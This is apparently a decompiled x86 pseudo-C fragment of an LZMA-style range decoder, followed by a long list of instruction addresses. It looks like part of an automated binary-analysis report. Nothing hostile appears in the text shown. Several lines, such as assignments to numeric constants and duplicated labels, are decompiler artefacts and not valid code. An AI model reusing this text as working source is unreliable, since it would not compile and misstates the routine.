											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                    0x00407194
                                    0x00407194
                                    0x00407194
                                    0x00407194
                                    0x0040719a
                                    0x0040719e
                                    0x004071a2
                                    0x004071ac
                                    0x004071ba
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x004074c7
                                    0x004074c7
                                    0x004074cb
                                    0x00000000
                                    0x00000000
                                    0x004074cd
                                    0x004074d6
                                    0x004074dc
                                    0x004074df
                                    0x004074e2
                                    0x004074e5
                                    0x004074e8
                                    0x004074ee
                                    0x00407507
                                    0x0040750a
                                    0x00407516
                                    0x00407517
                                    0x0040751a
                                    0x004074f0
                                    0x004074f0
                                    0x004074ff
                                    0x00407502
                                    0x00407502
                                    0x00407524
                                    0x004074c4
                                    0x004074c4
                                    0x004074c4
                                    0x004074c7
                                    0x004074cb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407526
                                    0x00407526
                                    0x0040749f
                                    0x004074a3
                                    0x004075db
                                    0x004075db
                                    0x004075e5
                                    0x004075ed
                                    0x004075f4
                                    0x004075f6
                                    0x004075fd
                                    0x00407601
                                    0x00407601
                                    0x004074a9
                                    0x004074af
                                    0x004074b6
                                    0x004074be
                                    0x004074be
                                    0x004074c1
                                    0x00000000
                                    0x004074c1
                                    0x0040752b
                                    0x00407538
                                    0x0040753b
                                    0x00407447
                                    0x00407447
                                    0x00407447
                                    0x00406be3
                                    0x00406be3
                                    0x00406be3
                                    0x00406bec
                                    0x00000000
                                    0x00000000
                                    0x00406bf2
                                    0x00406bf2
                                    0x00000000
                                    0x00406bf9
                                    0x00406bfd
                                    0x00000000
                                    0x00000000
                                    0x00406c03
                                    0x00406c06
                                    0x00406c09
                                    0x00406c0c
                                    0x00406c10
                                    0x00000000
                                    0x00000000
                                    0x00406c16
                                    0x00406c16
                                    0x00406c19
                                    0x00406c1b
                                    0x00406c1c
                                    0x00406c1f
                                    0x00406c21
                                    0x00406c22
                                    0x00406c24
                                    0x00406c27
                                    0x00406c2c
                                    0x00406c31
                                    0x00406c3a
                                    0x00406c4d
                                    0x00406c50
                                    0x00406c5c
                                    0x00406c84
                                    0x00406c86
                                    0x00406c94
                                    0x00406c94
                                    0x00406c98
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406c88
                                    0x00406c88
                                    0x00406c8b
                                    0x00406c8c
                                    0x00406c8c
                                    0x00000000
                                    0x00406c88
                                    0x00406c5e
                                    0x00406c62
                                    0x00406c67
                                    0x00406c67
                                    0x00406c70
                                    0x00406c78
                                    0x00406c7b
                                    0x00000000
                                    0x00406c81
                                    0x00406c81
                                    0x00000000
                                    0x00406c81
                                    0x00000000
                                    0x00406c9e
                                    0x00406c9e
                                    0x00406ca2
                                    0x0040754e
                                    0x0040754e
                                    0x00000000
                                    0x0040754e
                                    0x00406ca8
                                    0x00406cab
                                    0x00406cbb
                                    0x00406cbe
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc1
                                    0x00406cc4
                                    0x00406cc8
                                    0x00000000
                                    0x00000000
                                    0x00406cca
                                    0x00406cca
                                    0x00406cd0
                                    0x00406cfa
                                    0x00406d00
                                    0x00406d07
                                    0x00000000
                                    0x00406d07
                                    0x00406cd2
                                    0x00406cd6
                                    0x00406cd9
                                    0x00406cde
                                    0x00406cde
                                    0x00406ce9
                                    0x00406cf1
                                    0x00406cf4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00406d39
                                    0x00406d3f
                                    0x00406d42
                                    0x00406d4f
                                    0x00406d57
                                    0x00000000
                                    0x00000000
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d12
                                    0x0040755d
                                    0x0040755d
                                    0x00000000
                                    0x0040755d
                                    0x00406d18
                                    0x00406d1e
                                    0x00406d29
                                    0x00406d29
                                    0x00406d29
                                    0x00406d2c
                                    0x00406d2f
                                    0x00406d32
                                    0x00406d37
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004073ce
                                    0x004073ce
                                    0x004073d4
                                    0x004073da
                                    0x004073e0
                                    0x004073fa
                                    0x004073fd
                                    0x00407403
                                    0x0040740e
                                    0x0040740e
                                    0x00407410
                                    0x004073e2
                                    0x004073e2
                                    0x004073f1
                                    0x004073f5
                                    0x004073f5
                                    0x0040741a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040741c
                                    0x00407420
                                    0x004075cf
                                    0x004075cf
                                    0x00000000
                                    0x004075cf
                                    0x00407426
                                    0x0040742c
                                    0x00407433
                                    0x0040743b
                                    0x0040743e
                                    0x00407441
                                    0x00407441
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x00000000
                                    0x00406d5f
                                    0x00406d5f
                                    0x00406d61
                                    0x00406d64
                                    0x00406dd5
                                    0x00406dd5
                                    0x00406dd8
                                    0x00406ddb
                                    0x00406de2
                                    0x00406dec
                                    0x00000000
                                    0x00406dec
                                    0x00406d66
                                    0x00406d66
                                    0x00406d6a
                                    0x00406d6d
                                    0x00406d6f
                                    0x00406d72
                                    0x00406d75
                                    0x00406d77
                                    0x00406d7a
                                    0x00406d7c
                                    0x00406d81
                                    0x00406d84
                                    0x00406d87
                                    0x00406d8b
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9c
                                    0x00406da0
                                    0x00406da8
                                    0x00406da8
                                    0x00406da8
                                    0x00406da2
                                    0x00406da2
                                    0x00406da2
                                    0x00406d97
                                    0x00406d97
                                    0x00406d97
                                    0x00406dac
                                    0x00406daf
                                    0x00406dcd
                                    0x00406dcd
                                    0x00406dcf
                                    0x00000000
                                    0x00406db1
                                    0x00406db1
                                    0x00406db1
                                    0x00406db4
                                    0x00406db7
                                    0x00406dba
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbc
                                    0x00406dbf
                                    0x00406dc2
                                    0x00406dc4
                                    0x00406dc5
                                    0x00406dc8
                                    0x00000000
                                    0x00406dc8
                                    0x00000000
                                    0x00406ffe
                                    0x00406ffe
                                    0x00407002
                                    0x00407020
                                    0x00407020
                                    0x00407023
                                    0x0040702a
                                    0x0040702d
                                    0x00407030
                                    0x00407033
                                    0x00407036
                                    0x00407039
                                    0x0040703b
                                    0x00407042
                                    0x00407043
                                    0x00407045
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x0040704e
                                    0x00407053
                                    0x00000000
                                    0x00407053
                                    0x00407004
                                    0x00407004
                                    0x00407007
                                    0x0040700a
                                    0x00407014
                                    0x00000000
                                    0x00000000
                                    0x00407068
                                    0x00407068
                                    0x0040706c
                                    0x0040708f
                                    0x00407092
                                    0x00407095
                                    0x0040709f
                                    0x0040706e
                                    0x0040706e
                                    0x00407071
                                    0x00407074
                                    0x00407077
                                    0x00407084
                                    0x00407087
                                    0x00407087
                                    0x00000000
                                    0x00000000
                                    0x004070ab
                                    0x004070ab
                                    0x004070af
                                    0x00000000
                                    0x00000000
                                    0x004070b5
                                    0x004070b5
                                    0x004070b9
                                    0x00000000
                                    0x00000000
                                    0x004070bf
                                    0x004070bf
                                    0x004070c1
                                    0x004070c5
                                    0x004070c5
                                    0x004070c8
                                    0x004070cc
                                    0x00000000
                                    0x00000000
                                    0x0040711c
                                    0x0040711c
                                    0x00407120
                                    0x00407127
                                    0x00407127
                                    0x0040712a
                                    0x0040712d
                                    0x00407137
                                    0x00000000
                                    0x00407137
                                    0x00407122
                                    0x00407122
                                    0x00000000
                                    0x00000000
                                    0x00407143
                                    0x00407143
                                    0x00407147
                                    0x0040714e
                                    0x00407151
                                    0x00407154
                                    0x00407149
                                    0x00407149
                                    0x00407149
                                    0x00407157
                                    0x0040715a
                                    0x0040715d
                                    0x0040715d
                                    0x00407160
                                    0x00407163
                                    0x00407166
                                    0x00407166
                                    0x00407169
                                    0x00407170
                                    0x00407175
                                    0x00000000
                                    0x00000000
                                    0x00407203
                                    0x00407203
                                    0x00407207
                                    0x004075a5
                                    0x004075a5
                                    0x00000000
                                    0x004075a5
                                    0x0040720d
                                    0x0040720d
                                    0x00407210
                                    0x00407213
                                    0x00407217
                                    0x0040721a
                                    0x00407220
                                    0x00407222
                                    0x00407222
                                    0x00407222
                                    0x00407225
                                    0x00407228
                                    0x00000000
                                    0x00000000
                                    0x00406df8
                                    0x00406df8
                                    0x00406dfc
                                    0x00407569
                                    0x00407569
                                    0x00000000
                                    0x00407569
                                    0x00406e02
                                    0x00406e02
                                    0x00406e05
                                    0x00406e08
                                    0x00406e0c
                                    0x00406e0f
                                    0x00406e15
                                    0x00406e17
                                    0x00406e17
                                    0x00406e17
                                    0x00406e1a
                                    0x00406e1d
                                    0x00406e1d
                                    0x00406e20
                                    0x00406e23
                                    0x00000000
                                    0x00000000
                                    0x00406e29
                                    0x00406e29
                                    0x00406e2f
                                    0x00000000
                                    0x00000000
                                    0x00406e35
                                    0x00406e35
                                    0x00406e39
                                    0x00406e3c
                                    0x00406e3f
                                    0x00406e42
                                    0x00406e45
                                    0x00406e46
                                    0x00406e49
                                    0x00406e4b
                                    0x00406e51
                                    0x00406e54
                                    0x00406e57
                                    0x00406e5a
                                    0x00406e5d
                                    0x00406e60
                                    0x00406e63
                                    0x00406e7f
                                    0x00406e82
                                    0x00406e85
                                    0x00406e88
                                    0x00406e8f
                                    0x00406e93
                                    0x00406e95
                                    0x00406e99
                                    0x00406e65
                                    0x00406e65
                                    0x00406e69
                                    0x00406e71
                                    0x00406e76
                                    0x00406e78
                                    0x00406e7a
                                    0x00406e7a
                                    0x00406e9c
                                    0x00406ea3
                                    0x00406ea6
                                    0x00000000
                                    0x00406eac
                                    0x00406eac
                                    0x00000000
                                    0x00406eac
                                    0x00000000
                                    0x00406eb1
                                    0x00406eb1
                                    0x00406eb5
                                    0x00407575
                                    0x00407575
                                    0x00000000
                                    0x00407575
                                    0x00406ebb
                                    0x00406ebb
                                    0x00406ebe
                                    0x00406ec1
                                    0x00406ec5
                                    0x00406ec8
                                    0x00406ece
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed0
                                    0x00406ed3
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406ed6
                                    0x00406edc
                                    0x00000000
                                    0x00000000
                                    0x00406ede
                                    0x00406ede
                                    0x00406ee1
                                    0x00406ee4
                                    0x00406ee7
                                    0x00406eea
                                    0x00406eed
                                    0x00406ef0
                                    0x00406ef3
                                    0x00406ef6
                                    0x00406ef9
                                    0x00406efc
                                    0x00406f14
                                    0x00406f17
                                    0x00406f1a
                                    0x00406f1d
                                    0x00406f1d
                                    0x00406f20
                                    0x00406f24
                                    0x00406f26
                                    0x00406efe
                                    0x00406efe
                                    0x00406f06
                                    0x00406f0b
                                    0x00406f0d
                                    0x00406f0f
                                    0x00406f0f
                                    0x00406f29
                                    0x00406f30
                                    0x00406f33
                                    0x00000000
                                    0x00406f35
                                    0x00406f35
                                    0x00000000
                                    0x00406f35
                                    0x00406f33
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00406f3a
                                    0x00000000
                                    0x00000000
                                    0x00406f75
                                    0x00406f75
                                    0x00406f79
                                    0x00407581
                                    0x00407581
                                    0x00000000
                                    0x00407581
                                    0x00406f7f
                                    0x00406f7f
                                    0x00406f82
                                    0x00406f85
                                    0x00406f89
                                    0x00406f8c
                                    0x00406f92
                                    0x00406f94
                                    0x00406f94
                                    0x00406f94
                                    0x00406f97
                                    0x00406f9a
                                    0x00406f9a
                                    0x00406fa0
                                    0x00406f3e
                                    0x00406f3e
                                    0x00406f41
                                    0x00000000
                                    0x00406f41
                                    0x00406fa2
                                    0x00406fa2
                                    0x00406fa5
                                    0x00406fa8
                                    0x00406fab
                                    0x00406fae
                                    0x00406fb1
                                    0x00406fb4
                                    0x00406fb7
                                    0x00406fba
                                    0x00406fbd
                                    0x00406fc0
                                    0x00406fd8
                                    0x00406fdb
                                    0x00406fde
                                    0x00406fe1
                                    0x00406fe1
                                    0x00406fe4
                                    0x00406fe8
                                    0x00406fea
                                    0x00406fc2
                                    0x00406fc2
                                    0x00406fca
                                    0x00406fcf
                                    0x00406fd1
                                    0x00406fd3
                                    0x00406fd3
                                    0x00406fed
                                    0x00406ff4
                                    0x00406ff7
                                    0x00000000
                                    0x00406ff9
                                    0x00406ff9
                                    0x00000000
                                    0x00406ff9
                                    0x00000000
                                    0x00407286
                                    0x00407286
                                    0x0040728a
                                    0x004075b1
                                    0x004075b1
                                    0x00000000
                                    0x004075b1
                                    0x00407290
                                    0x00407290
                                    0x00407293
                                    0x00407296
                                    0x0040729a
                                    0x0040729d
                                    0x004072a3
                                    0x004072a5
                                    0x004072a5
                                    0x004072a5
                                    0x004072a8
                                    0x00000000
                                    0x00000000
                                    0x00407056
                                    0x00407056
                                    0x00407059
                                    0x00000000
                                    0x00000000
                                    0x00407395
                                    0x00407395
                                    0x00407399
                                    0x004073bb
                                    0x004073bb
                                    0x004073be
                                    0x004073c8
                                    0x004073cb
                                    0x004073cb
                                    0x00000000
                                    0x004073cb
                                    0x0040739b
                                    0x0040739b
                                    0x0040739e
                                    0x004073a2
                                    0x004073a5
                                    0x004073a5
                                    0x004073a8
                                    0x00000000
                                    0x00000000
                                    0x00407452
                                    0x00407452
                                    0x00407456
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x00407474
                                    0x0040747b
                                    0x00407482
                                    0x00407489
                                    0x00407489
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x0040749d
                                    0x00407458
                                    0x00407458
                                    0x0040745b
                                    0x0040745e
                                    0x00407461
                                    0x00407468
                                    0x004073ac
                                    0x004073ac
                                    0x004073af
                                    0x00000000
                                    0x00000000
                                    0x00407543
                                    0x00407543
                                    0x00407546
                                    0x00407447
                                    0x00407447
                                    0x00407447
                                    0x00000000
                                    0x0040744d
                                    0x00000000
                                    0x0040717d
                                    0x0040717d
                                    0x0040717f
                                    0x00407186
                                    0x00407187
                                    0x00407189
                                    0x0040718c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00407490
                                    0x00407490
                                    0x00407493
                                    0x0040749a
                                    0x00000000
                                    0x0040749d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004071c2
                                    0x004071c2
                                    0x004071c5
                                    0x004071fb
                                    0x004071fb
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732b
                                    0x0040732e
                                    0x0040732e
                                    0x00407331
